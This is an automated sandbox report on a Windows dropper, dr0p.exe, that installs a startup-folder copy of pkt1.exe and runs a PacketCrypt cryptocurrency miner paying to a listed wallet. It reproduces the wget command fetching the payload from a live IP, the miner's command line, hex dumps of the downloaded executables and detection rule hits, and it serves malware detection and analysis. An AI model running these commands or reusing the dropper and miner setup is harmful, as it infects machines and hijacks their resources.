Edit tour

Windows Analysis Report
http://23.27.51.244/dr0p.exe

Overview

General Information

Sample URL:	http://23.27.51.244/dr0p.exe
Analysis ID:	1585253
Infos:

Detection

Score:	68
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for dropped file

AI detected suspicious URL

Drops PE files to the startup folder

Found API chain with Download & Execute functionality

Machine Learning detection for dropped file

Yara detected Generic Downloader

Abnormal high CPU Usage

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Creates a process in suspended mode (likely to inject code)

Creates a start menu entry (Start Menu\Programs\Startup)

Downloads executable code via HTTP

Drops PE files

Found dropped PE file which has not been started or loaded

Found large amount of non-executed APIs

HTTP GET or POST without a user agent

PE file contains an invalid checksum

PE file contains executable resources (Code or Archives)

PE file contains sections with non-standard names

PE file does not import any functions

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: Startup Folder File Write

Sigma detected: Usage Of Web Request Commands And Cmdlets

Stores files to the Windows start menu directory

Suricata IDS alerts with low severity for network traffic

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Process Tree

System is w10x64

cmd.exe (PID: 3944 cmdline: C:\Windows\system32\cmd.exe /c wget -t 2 -v -T 60 -P "C:\Users\user\Desktop\download" --no-check-certificate --content-disposition --user-agent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko" "http://23.27.51.244/dr0p.exe" > cmdline.out 2>&1 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 1708 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

wget.exe (PID: 6404 cmdline: wget -t 2 -v -T 60 -P "C:\Users\user\Desktop\download" --no-check-certificate --content-disposition --user-agent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko" "http://23.27.51.244/dr0p.exe" MD5: 3DADB6E2ECE9C4B3E1E322E617658B60)

dr0p.exe (PID: 5456 cmdline: "C:\Users\user\Desktop\download\dr0p.exe" MD5: 5290766026D3727C3262FD48DB6DB0A4)

pkt1.exe (PID: 6180 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe" MD5: 5F6CDA0F181FE14E6D395CDB50C37C41)

conhost.exe (PID: 6484 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

packetcrypt.exe (PID: 3356 cmdline: "C:\Users\user\AppData\Local\Temp\packetcrypt.exe" ann -p pkt1qxysc58g4cwwautg6dr4p7q7sd6tn2ldgukth5a http://pool.pkt.world MD5: 82C7D11916FDFBF24EAE6BF9200A48C9)

conhost.exe (PID: 6628 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cleanup

Yara Signatures

Dropped Files

Source	Rule	Description	Author
C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.dll	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Net.dll	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\netstandard.dll	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security

Sigma Signatures

Sigma detected: Startup Folder File Write

Source: File created

Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\Desktop\download\dr0p.exe, ProcessId: 5456, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe

Sigma detected: Usage Of Web Request Commands And Cmdlets

Source: Process started

Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: C:\Windows\system32\cmd.exe /c wget -t 2 -v -T 60 -P "C:\Users\user\Desktop\download" --no-check-certificate --content-disposition --user-agent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko" "http://23.27.51.244/dr0p.exe" > cmdline.out 2>&1, CommandLine: C:\Windows\system32\cmd.exe /c wget -t 2 -v -T 60 -P "C:\Users\user\Desktop\download" --no-check-certificate --content-disposition --user-agent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko" "http://23.27.51.244/dr0p.exe" > cmdline.out 2>&1, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 5468, ProcessCommandLine: C:\Windows\system32\cmd.exe /c wget -t 2 -v -T 60 -P "C:\Users\user\Desktop\download" --no-check-certificate --content-disposition --user-agent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko" "http://23.27.51.244/dr0p.exe" > cmdline.out 2>&1, ProcessId: 3944, ProcessName: cmd.exe

Suricata Signatures

ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-07T11:58:57.746455+0100	2019714	2	Potentially Bad Traffic	192.168.2.5	49705	23.27.51.244	80	TCP

ETPRO MALWARE Common Downloader Header Pattern UHCa

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-07T11:58:57.746455+0100	2803270	2	Potentially Bad Traffic	192.168.2.5	49705	23.27.51.244	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\PacketCryptApp.dll

ReversingLabs: Detection: 18%

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\PacketCryptApp.dll

Joe Sandbox ML: detected

Phishing

AI detected suspicious URL

Source: URL

Joe Sandbox AI: AI detected IP in URL: http://23.27.51.244

Source:	Binary string: /_/artifacts/obj/System.Runtime.Handles/Release/net8.0-windows/System.Runtime.Handles.pdbSHA256 source: System.Runtime.Handles.dll.6.dr
Source:	Binary string: D:\a\_work\1\s\artifacts\obj\System.Private.Xml\Release\net8.0-windows\System.Private.Xml.pdb source: System.Private.Xml.dll.6.dr
Source:	Binary string: System.Diagnostics.Process.ni.pdb source: pkt1.exe, 00000006.00000002.3265014655.00007FF8B7E01000.00000020.00000001.01000000.00000008.sdmp
Source:	Binary string: System.ComponentModel.Primitives.ni.pdb source: pkt1.exe, 00000006.00000002.3265265471.00007FF8BA511000.00000020.00000001.01000000.00000009.sdmp
Source:	Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.NetworkInformation\Release\net8.0-windows\System.Net.NetworkInformation.pdb source: System.Net.NetworkInformation.dll.6.dr
Source:	Binary string: /_/artifacts/obj/System.Runtime.Handles/Release/net8.0-windows/System.Runtime.Handles.pdb source: System.Runtime.Handles.dll.6.dr
Source:	Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime\Release\net8.0\System.Runtime.pdbSHA256 source: pkt1.exe, 00000006.00000002.3220795521.0000025674022000.00000002.00000001.01000000.0000000F.sdmp
Source:	Binary string: D:\a\_work\1\s\artifacts\obj\System.Xml.XDocument\Release\net8.0\System.Xml.XDocument.pdbSHA256 source: System.Xml.XDocument.dll.6.dr
Source:	Binary string: D:\a\_work\1\s\artifacts\obj\System.Console\Release\net8.0-windows\System.Console.pdb source: pkt1.exe, 00000006.00000002.3264924713.00007FF8B78A1000.00000020.00000001.01000000.0000000A.sdmp, System.Console.dll.6.dr
Source:	Binary string: D:\a\_work\1\s\artifacts\obj\coreclr\windows.x64.Release\dlls\mscordac\mscordaccore.pdb source: pkt1.exe, pkt1.exe, 00000006.00000000.2352610404.00007FF6473C8000.00000002.00000001.01000000.00000005.sdmp
Source:	Binary string: System.Net.Http.Json.ni.pdb source: System.Net.Http.Json.dll.6.dr
Source:	Binary string: System.IO.MemoryMappedFiles.ni.pdb source: System.IO.MemoryMappedFiles.dll.6.dr
Source:	Binary string: /_/artifacts/obj/System.Reflection.Extensions/Release/net8.0-windows/System.Reflection.Extensions.pdbSHA256> source: System.Reflection.Extensions.dll.6.dr
Source:	Binary string: C:\Users\Admin.DESKTOP-9H4MNNT\Desktop\1111\PacketCryptApp\obj\Release\net8.0\win-x64\PacketCryptApp.pdbSHA256_u source: pkt1.exe, 00000006.00000002.3221267777.0000025677452000.00000002.00000001.01000000.00000007.sdmp
Source:	Binary string: /_/artifacts/obj/System.Security.Cryptography.OpenSsl/Release/net8.0-windows/System.Security.Cryptography.OpenSsl.pdb source: System.Security.Cryptography.OpenSsl.dll.6.dr
Source:	Binary string: D:\a\_work\1\s\artifacts\obj\System.Xml.XDocument\Release\net8.0\System.Xml.XDocument.pdb source: System.Xml.XDocument.dll.6.dr
Source:	Binary string: D:\a\_work\1\s\artifacts\obj\System.Diagnostics.Process\Release\net8.0-windows\System.Diagnostics.Process.pdb source: pkt1.exe, 00000006.00000002.3265014655.00007FF8B7E01000.00000020.00000001.01000000.00000008.sdmp
Source:	Binary string: D:\a\_work\1\s\artifacts\obj\Microsoft.Win32.Primitives\Release\net8.0\Microsoft.Win32.Primitives.pdb source: pkt1.exe, 00000006.00000002.3220861008.0000025674032000.00000002.00000001.01000000.00000010.sdmp, Microsoft.Win32.Primitives.dll.6.dr
Source:	Binary string: System.Memory.ni.pdb source: pkt1.exe, 00000006.00000002.3264827588.00007FF8B7821000.00000020.00000001.01000000.0000000B.sdmp
Source:	Binary string: D:\a\_work\1\s\artifacts\obj\System.Text.Encoding.Extensions\Release\net8.0\System.Text.Encoding.Extensions.pdbSHA2560 source: pkt1.exe, 00000006.00000002.3220953516.0000025674042000.00000002.00000001.01000000.00000011.sdmp
Source:	Binary string: /_/artifacts/obj/System.Diagnostics.Tools/Release/net8.0-windows/System.Diagnostics.Tools.pdb source: System.Diagnostics.Tools.dll.6.dr
Source:	Binary string: System.Private.CoreLib.ni.pdb source: pkt1.exe, 00000006.00000002.3224952852.00007FF8A82B1000.00000020.00000001.01000000.00000006.sdmp, System.Private.CoreLib.dll.6.dr
Source:	Binary string: System.Private.Xml.ni.pdb source: System.Private.Xml.dll.6.dr
Source:	Binary string: /_/artifacts/obj/System.Security.Cryptography.OpenSsl/Release/net8.0-windows/System.Security.Cryptography.OpenSsl.pdbSHA256 source: System.Security.Cryptography.OpenSsl.dll.6.dr
Source:	Binary string: /_/artifacts/obj/System.Numerics/Release/net8.0-windows/System.Numerics.pdbSHA256<t source: System.Numerics.dll.6.dr
Source:	Binary string: D:\a\_work\1\s\artifacts\obj\System.IO.MemoryMappedFiles\Release\net8.0-windows\System.IO.MemoryMappedFiles.pdb source: System.IO.MemoryMappedFiles.dll.6.dr
Source:	Binary string: System.Collections.Specialized.ni.pdb source: System.Collections.Specialized.dll.6.dr
Source:	Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.Http.Json\Release\net8.0\System.Net.Http.Json.pdb source: System.Net.Http.Json.dll.6.dr
Source:	Binary string: /_/artifacts/obj/System.Reflection.Extensions/Release/net8.0-windows/System.Reflection.Extensions.pdb source: System.Reflection.Extensions.dll.6.dr
Source:	Binary string: System.Runtime.InteropServices.ni.pdb source: pkt1.exe, 00000006.00000002.3265112566.00007FF8B9F61000.00000020.00000001.01000000.0000000D.sdmp
Source:	Binary string: D:\a\_work\1\s\artifacts\obj\System.Threading\Release\net8.0\System.Threading.pdb source: pkt1.exe, 00000006.00000002.3265197772.00007FF8BA4F1000.00000020.00000001.01000000.0000000C.sdmp
Source:	Binary string: /_/artifacts/obj/System.Globalization.Extensions/Release/net8.0-windows/System.Globalization.Extensions.pdb source: System.Globalization.Extensions.dll.6.dr
Source:	Binary string: /_/artifacts/obj/System.Diagnostics.Tools/Release/net8.0-windows/System.Diagnostics.Tools.pdbSHA256 source: System.Diagnostics.Tools.dll.6.dr
Source:	Binary string: D:\a\_work\1\s\artifacts\obj\coreclr\windows.x64.Release\Corehost.Static\singlefilehost.pdb source: pkt1.exe, 00000006.00000002.3224591101.00007FF6471ED000.00000002.00000001.01000000.00000005.sdmp, pkt1.exe, 00000006.00000000.2352463284.00007FF6471ED000.00000002.00000001.01000000.00000005.sdmp
Source:	Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.WebHeaderCollection\Release\net8.0\System.Net.WebHeaderCollection.pdb source: System.Net.WebHeaderCollection.dll.6.dr
Source:	Binary string: D:\a\_work\1\s\artifacts\obj\coreclr\System.Private.CoreLib\x64\Release\System.Private.CoreLib.pdb source: pkt1.exe, 00000006.00000002.3224952852.00007FF8A82B1000.00000020.00000001.01000000.00000006.sdmp, System.Private.CoreLib.dll.6.dr
Source:	Binary string: D:\a\_work\1\s\artifacts\obj\System.Memory\Release\net8.0\System.Memory.pdb source: pkt1.exe, 00000006.00000002.3264827588.00007FF8B7821000.00000020.00000001.01000000.0000000B.sdmp
Source:	Binary string: /_/artifacts/obj/netstandard/Release/net8.0-windows/netstandard.pdb source: pkt1.exe, 00000006.00000002.3222444888.00000256780F0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Net.WebHeaderCollection.ni.pdb source: System.Net.WebHeaderCollection.dll.6.dr
Source:	Binary string: D:\a\_work\1\s\artifacts\obj\System.ComponentModel.Primitives\Release\net8.0\System.ComponentModel.Primitives.pdb source: pkt1.exe, 00000006.00000002.3265265471.00007FF8BA511000.00000020.00000001.01000000.00000009.sdmp
Source:	Binary string: D:\a\_work\1\s\artifacts\obj\System.IO.MemoryMappedFiles\Release\net8.0-windows\System.IO.MemoryMappedFiles.pdbSHA2562R4c source: System.IO.MemoryMappedFiles.dll.6.dr
Source:	Binary string: /_/artifacts/obj/netstandard/Release/net8.0-windows/netstandard.pdbSHA256%# source: pkt1.exe, 00000006.00000002.3222444888.00000256780F0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Console.ni.pdb source: pkt1.exe, 00000006.00000002.3264924713.00007FF8B78A1000.00000020.00000001.01000000.0000000A.sdmp, System.Console.dll.6.dr
Source:	Binary string: System.Threading.ni.pdb source: pkt1.exe, 00000006.00000002.3265197772.00007FF8BA4F1000.00000020.00000001.01000000.0000000C.sdmp
Source:	Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime\Release\net8.0\System.Runtime.pdb source: pkt1.exe, 00000006.00000002.3220795521.0000025674022000.00000002.00000001.01000000.0000000F.sdmp
Source:	Binary string: /_/artifacts/obj/System.Globalization.Extensions/Release/net8.0-windows/System.Globalization.Extensions.pdbSHA256{= source: System.Globalization.Extensions.dll.6.dr
Source:	Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime.InteropServices\Release\net8.0\System.Runtime.InteropServices.pdb source: pkt1.exe, 00000006.00000002.3265112566.00007FF8B9F61000.00000020.00000001.01000000.0000000D.sdmp
Source:	Binary string: /_/artifacts/obj/System.Numerics/Release/net8.0-windows/System.Numerics.pdb source: System.Numerics.dll.6.dr
Source:	Binary string: D:\a\_work\1\s\artifacts\obj\System.Collections.Specialized\Release\net8.0\System.Collections.Specialized.pdb source: System.Collections.Specialized.dll.6.dr
Source:	Binary string: D:\a\_work\1\s\artifacts\obj\System.Text.Encoding.Extensions\Release\net8.0\System.Text.Encoding.Extensions.pdb source: pkt1.exe, 00000006.00000002.3220953516.0000025674042000.00000002.00000001.01000000.00000011.sdmp
Source:	Binary string: D:\a\_work\1\s\artifacts\obj\Microsoft.Win32.Primitives\Release\net8.0\Microsoft.Win32.Primitives.pdbSHA256%B source: pkt1.exe, 00000006.00000002.3220861008.0000025674032000.00000002.00000001.01000000.00000010.sdmp, Microsoft.Win32.Primitives.dll.6.dr
Source:	Binary string: C:\Users\Admin.DESKTOP-9H4MNNT\Desktop\1111\PacketCryptApp\obj\Release\net8.0\win-x64\PacketCryptApp.pdb source: pkt1.exe, 00000006.00000002.3221267777.0000025677452000.00000002.00000001.01000000.00000007.sdmp
Source:	Binary string: System.Net.NetworkInformation.ni.pdb source: System.Net.NetworkInformation.dll.6.dr

Source: C:\Users\user\Desktop\download\dr0p.exe	File opened: C:\Users\user\AppData\	Jump to behavior
Source: C:\Users\user\Desktop\download\dr0p.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\	Jump to behavior
Source: C:\Users\user\Desktop\download\dr0p.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\	Jump to behavior
Source: C:\Users\user\Desktop\download\dr0p.exe	File opened: C:\Users\user\	Jump to behavior
Source: C:\Users\user\Desktop\download\dr0p.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\	Jump to behavior
Source: C:\Users\user\Desktop\download\dr0p.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\	Jump to behavior

Networking

Yara detected Generic Downloader

Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.dll, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Net.dll, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\netstandard.dll, type: DROPPED

Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 07 Jan 2025 10:58:52 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 06 Jan 2025 05:16:56 GMTETag: "21d-62b02bcbe81b1"Accept-Ranges: bytesContent-Length: 541Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdos-programData Raw: 4d 5a 32 33 50 45 00 00 4c 01 00 00 0f a3 2d e2 00 40 00 11 f6 45 eb 2c 08 00 02 00 0b 01 60 8a 06 d2 e8 32 07 75 6b 4e 4f 31 c9 bd 64 00 00 00 d0 eb 72 eb 75 f1 eb 5a 00 00 40 00 04 00 00 00 04 00 00 00 01 c0 85 c0 79 c2 01 d3 04 00 50 3d 00 00 00 00 eb 77 00 02 30 00 00 00 5a 7c e7 c3 02 00 00 00 53 bf 00 00 42 00 6a 01 58 31 ed 01 f6 57 6a 08 59 6a 04 3d 00 00 00 00 6a 05 ba de 65 24 14 b3 1f 60 04 00 31 c0 99 8b 74 24 28 4e eb 8c 61 75 0e 40 42 d2 0e 72 04 d1 ea eb 02 d1 e8 d2 06 46 39 f7 7f e8 b1 05 89 e6 01 56 24 3d 00 00 00 00 74 05 01 46 20 85 d2 e1 ef 61 4b 01 d2 72 c2 75 f9 5b 66 81 ff c0 01 eb 8f f7 e2 f7 f3 5a 39 c6 72 05 92 29 d6 29 d0 d0 17 e2 96 47 eb 90 a0 8e 31 b4 b0 1d da 89 83 00 8e 40 b9 b2 6c 06 e7 12 dd 0b 78 b8 90 f6 ff 18 a4 07 df d7 df 61 c0 33 99 c7 3c 13 82 5b 3c ca 2f c2 f1 52 c6 2a eb a5 8c d7 da a8 db 6e 51 d7 56 52 e4 42 e7 fc e6 6d 93 b5 c7 8e d7 5e 47 f4 f6 e7 17 fb 05 3f 71 d8 50 29 56 83 42 0e 50 a0 ff fc 94 8b 45 85 38 58 0e 60 dd 0a 57 d6 5d 06 be fe 6a 71 2d 19 8c 60 32 b3 82 a0 c1 8b ee 94 ea 3e 50 8b d0 11 fd 60 58 1b 76 7b 98 56 6c f4 54 f0 95 80 dc 0b c9 5e 58 64 fe 42 d8 18 82 64 9e af 41 d9 3c 38 6a 93 82 78 15 2c 9a a4 b5 01 7d 06 17 14 82 ee 13 36 99 a9 af 00 1b 3a ad 63 34 2b 57 59 ad 47 29 f1 6e 4e 11 97 dd e9 f4 e1 40 25 68 9c 6a 6c f8 6e 23 72 c9 f7 42 1b 7a 04 63 06 f0 34 cb be ee b6 34 a4 81 f3 14 4b 63 67 4b 7a 5c 37 0a 07 12 30 b0 62 d4 2e 6b b8 fc 0d ed f1 16 9e f0 4f be 2c d1 c9 64 e4 f2 de d1 0a 36 4f f1 63 22 a8 68 24 57 f5 d0 97 c8 ff 2a 64 c4 99 dd be 76 3b a8 d9 eb 7d 82 e7 22 ec df 81 73 6d 21 5c 64 64 6d 54 bb 69 e0 97 1c 33 75 c0 04 Data Ascii: MZ23PEL-@E,`2ukNO1druZ@yP=w0Z\|SBjX1WjYj=je$`1t$(Nau@BrF9V$=tF aKru[fZ9r))G1@lxa3<[</RnQVRBm^G?qP)VBPE8X`W]jq-`2>P`Xv{VlT^XdBdA<8jx,}6:c4+WYG)nN@%hjln#rBzc44KcgKz\70b.kO,d6Oc"h$Wdv;}"sm!\ddmTi3u
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 07 Jan 2025 10:58:57 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 06 Jan 2025 05:15:33 GMTETag: "287a9be-62b02b7c80797"Accept-Ranges: bytesContent-Length: 42445246Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 0a 59 8b 17 4e 38 e5 44 4e 38 e5 44 4e 38 e5 44 47 40 76 44 58 38 e5 44 8d bb e6 45 5a 38 e5 44 8d bb e1 45 5c 38 e5 44 8d bb e0 45 11 38 e5 44 3e b9 e1 45 46 38 e5 44 3e b9 e4 45 43 38 e5 44 4e 38 e4 44 46 3a e5 44 5d bc e6 45 5b 38 e5 44 5d bc ec 45 c3 3a e5 44 5d bc e5 45 4f 38 e5 44 5d bc 1a 44 4f 38 e5 44 5d bc e7 45 4f 38 e5 44 52 69 63 68 4e 38 e5 44 00 00 00 00 00 00 00 00 50 45 00 00 64 86 0a 00 21 5f 11 67 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 0e 28 00 aa 61 00 00 ec 31 00 00 00 00 00 90 fe 5c 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 70 95 00 00 04 00 00 00 00 00 00 03 00 60 c1 00 00 18 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 f0 66 79 00 c4 00 00 00 b4 67 79 00 68 01 00 00 00 70 80 00 20 73 14 00 00 a0 7b 00 fc 60 03 00 00 00 00 00 00 00 00 00 00 f0 94 00 2c 7e 00 00 b0 a6 70 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 a8 70 00 28 00 00 00 40 45 62 00 40 01 00 00 00 00 00 00 00 00 00 00 00 d0 61 00 c8 0e 00 00 a4 64 79 00 60 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 1c a7 61 00 00 10 00 00 00 a8 61 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 43 4c 52 5f 55 45 46 dd 00 00 00 00 c0 61 00 00 02 00 00 00 ac 61 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 e2 c5 17 00 00 d0 61 00 00 c6 17 00 00 ae 61 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 c4 ff 01 00 00 a0 79 00 00 98 00 00 00 74 79 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 fc 60 03 00 00 a0 7b 00 00 62 03 00 00 0c 7a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 38 00 00 00 00 10 7f 00 00 02 00 00 00 6e 7d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 53 65 63 74 69 6f 6e 00 08 00 00 00 00 20 7f 00 00 02 00 00 00 70 7d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 5f 52 44 41 54 41 00 00 08 32 01 00 00 30 7f 00 00 34 01 00 00 72 7d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 20 73 14 00 00 70 80 00 00 74 14 00 00 a6 7e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 2c 7e 00 00 00 f0 94 00 00 80 00 00 00 1a 93 00 00 00 00 00 00 00 00 00

Source: global traffic	HTTP traffic detected: POST /anns/submit?cookie=913d38187b501dda5b38d1278781cb52f1c59d67b33093931b60ad55633c13b0 HTTP/1.1x-pc-payto: pkt1qxysc58g4cwwautg6dr4p7q7sd6tn2ldgukth5ax-pc-sver: 1x-pc-annver: 1x-pc-worknum: 2836973accept: /host: any.ah.pkt.worldtransfer-encoding: chunked
Source: global traffic	HTTP traffic detected: POST /anns/submit?cookie=913d38187b501dda5b38d1278781cb52f1c59d67b33093931b60ad55633c13b0 HTTP/1.1x-pc-payto: pkt1qxysc58g4cwwautg6dr4p7q7sd6tn2ldgukth5ax-pc-sver: 1x-pc-annver: 1x-pc-worknum: 2836973accept: /host: any.ah.pkt.worldtransfer-encoding: chunked
Source: global traffic	HTTP traffic detected: POST /anns/submit?cookie=913d38187b501dda5b38d1278781cb52f1c59d67b33093931b60ad55633c13b0 HTTP/1.1x-pc-payto: pkt1qxysc58g4cwwautg6dr4p7q7sd6tn2ldgukth5ax-pc-sver: 1x-pc-annver: 1x-pc-worknum: 2836974accept: /host: any.ah.pkt.worldtransfer-encoding: chunked
Source: global traffic	HTTP traffic detected: POST /anns/submit?cookie=913d38187b501dda5b38d1278781cb52f1c59d67b33093931b60ad55633c13b0 HTTP/1.1x-pc-payto: pkt1qxysc58g4cwwautg6dr4p7q7sd6tn2ldgukth5ax-pc-sver: 1x-pc-annver: 1x-pc-worknum: 2836974accept: /host: any.ah.pkt.worldtransfer-encoding: chunked
Source: global traffic	HTTP traffic detected: POST /anns/submit?cookie=913d38187b501dda5b38d1278781cb52f1c59d67b33093931b60ad55633c13b0 HTTP/1.1x-pc-payto: pkt1qxysc58g4cwwautg6dr4p7q7sd6tn2ldgukth5ax-pc-sver: 1x-pc-annver: 1x-pc-worknum: 2836974accept: /host: any.ah.pkt.worldtransfer-encoding: chunked
Source: global traffic	HTTP traffic detected: POST /anns/submit?cookie=913d38187b501dda5b38d1278781cb52f1c59d67b33093931b60ad55633c13b0 HTTP/1.1x-pc-payto: pkt1qxysc58g4cwwautg6dr4p7q7sd6tn2ldgukth5ax-pc-sver: 1x-pc-annver: 1x-pc-worknum: 2836974accept: /host: any.ah.pkt.worldtransfer-encoding: chunked
Source: global traffic	HTTP traffic detected: POST /anns/submit?cookie=913d38187b501dda5b38d1278781cb52f1c59d67b33093931b60ad55633c13b0 HTTP/1.1x-pc-payto: pkt1qxysc58g4cwwautg6dr4p7q7sd6tn2ldgukth5ax-pc-sver: 1x-pc-annver: 1x-pc-worknum: 2836974accept: /host: any.ah.pkt.worldtransfer-encoding: chunked

Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.5:49705 -> 23.27.51.244:80
Source: Network traffic	Suricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.5:49705 -> 23.27.51.244:80

Source: unknown	TCP traffic detected without corresponding DNS query: 23.27.51.244
Source: unknown	TCP traffic detected without corresponding DNS query: 23.27.51.244
Source: unknown	TCP traffic detected without corresponding DNS query: 23.27.51.244
Source: unknown	TCP traffic detected without corresponding DNS query: 23.27.51.244
Source: unknown	TCP traffic detected without corresponding DNS query: 23.27.51.244
Source: unknown	TCP traffic detected without corresponding DNS query: 23.27.51.244
Source: unknown	TCP traffic detected without corresponding DNS query: 23.27.51.244
Source: unknown	TCP traffic detected without corresponding DNS query: 23.27.51.244
Source: unknown	TCP traffic detected without corresponding DNS query: 23.27.51.244
Source: unknown	TCP traffic detected without corresponding DNS query: 23.27.51.244
Source: unknown	TCP traffic detected without corresponding DNS query: 23.27.51.244
Source: unknown	TCP traffic detected without corresponding DNS query: 23.27.51.244
Source: unknown	TCP traffic detected without corresponding DNS query: 23.27.51.244
Source: unknown	TCP traffic detected without corresponding DNS query: 23.27.51.244
Source: unknown	TCP traffic detected without corresponding DNS query: 23.27.51.244
Source: unknown	TCP traffic detected without corresponding DNS query: 23.27.51.244
Source: unknown	TCP traffic detected without corresponding DNS query: 23.27.51.244
Source: unknown	TCP traffic detected without corresponding DNS query: 23.27.51.244
Source: unknown	TCP traffic detected without corresponding DNS query: 23.27.51.244
Source: unknown	TCP traffic detected without corresponding DNS query: 23.27.51.244
Source: unknown	TCP traffic detected without corresponding DNS query: 23.27.51.244
Source: unknown	TCP traffic detected without corresponding DNS query: 23.27.51.244
Source: unknown	TCP traffic detected without corresponding DNS query: 23.27.51.244
Source: unknown	TCP traffic detected without corresponding DNS query: 23.27.51.244
Source: unknown	TCP traffic detected without corresponding DNS query: 23.27.51.244
